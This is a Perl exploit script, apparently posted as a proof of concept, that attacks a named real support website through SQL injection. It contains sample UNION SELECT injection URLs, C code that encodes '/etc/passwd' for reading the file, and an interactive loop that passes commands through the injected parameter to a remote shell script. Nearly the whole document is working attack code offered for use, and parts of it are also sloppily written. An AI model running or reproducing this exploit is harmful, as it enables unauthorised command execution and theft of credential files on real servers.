#!/usr/bin/perl
#You can get admin hash,or acces the pass file from the *NIx 
#with the generated strings with the generator.c program
#you have to put in sql specific comands,my example is for 
#tables and *NIX pass
#exploit tested on winxp sp2 
# #include<stdio.h>
 
# #include<stdlib.h>

# #include<string.h>
 
#   int main()
 
# { char st[1024];
#   int le;
#   printf("Input : ");
#   gets(st);
#   for(le=0;le<strlen(st);le++)
 
#   { printf("%d,",st[le]);
#   }   
#  system("pause");
  
#   return 0;
#  }

#101,116,99,47,112,97,115,115,119,100 = /etc/passwd

#If we would do this :
#http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8/*
#we create 8 tables ,to see the result type   :
#-1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8/*

print "......Start.......\n";
print ".................\n";
print ".          fl0 fl0w .\n";
print ".       found by fl0w fl0w\n";
print ".       c0ded by fl0 fl0w\n";
print ".......Email me at flo[underscore]fl0w[underscore]supremacy[dot]com\n\n";
print ".................\n\n";

use LWP::UserAgent;
 
$site=@ARGV[0];
 
 $shells=@ARGV[1];
 $shellcmd=@ARGV[2];
    
    if($site!~/http:\/\// || $site!~/http:\/\// || !$shells) 
 
  { routine()
  }

header();

 while() { print"[shell] \$";        
  while(<STDIN>)
 {  $cmd=$_;
                                                         
  chomp($cmd);
 $sploit=LWP::UserAgent->new() or die;
 $requesting=HTTP::Request->new(GET=>$site.'/index.php?cmd=DownloadVersion&ID=-1/**/UNION/**/SELECT/**/0/*'.$shells.'?&'.$shellcmd.'='.$cmd) or die"\n\n NOT CONNECTED\n";
 $re=$sploit->request(requesting); 
                                                         
 $i=$re->content;
 $i=~tr/[\n]/[&#234;]/;
  if(!$cmd) { print "Enter a command\n\n";
 $i=""; 
 }    
  

   elsif(i=~/failed to open:HTTP request failed!/ || $i=~/:cannot execute the command in <b>/ )
    
    { print "\nCould NOT connect to cmd from host \n";
  exit;
    }                                                     
     elsif($i=~/^<br.\/>.<b>WARNING/) { 
 print "\nInvalid command\n\n";

  };
  if($i=~/(.+)<br.\/>.<b>WARNING.(.+)<br.\/>.<b>WARNING/)
 { $last=$1;
   $last=~tr/[&234;]/[\n]/;
   print "\n$last\n";
  last;
 }


 else {
 print "[shell] \$";
      } 
    }  
 } 
 last;

sub header()
 { print q { 

================================================================================================================================================================
   MSQL injection -file disclosure in Jgaa's Internet 
  PoC:http://support.jgaa.com 
  Demo:http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=-1/**/UNION/**/SELECT/**/0/*
================================================================================================================================================================
  }
 
  }
    sub routine()
  { header();
     print q { 
====================================================================================================== 
 USAGE: perl exploit.pl <http://site.com>
 EXAMPLE: perl [localhost\][path] exploit.pl [target]
======================================================================================================   
     };

 exit();
   
     }




       
---------------------------------
Yahoo! oneSearch: Finally,  mobile search that gives answers, not web links.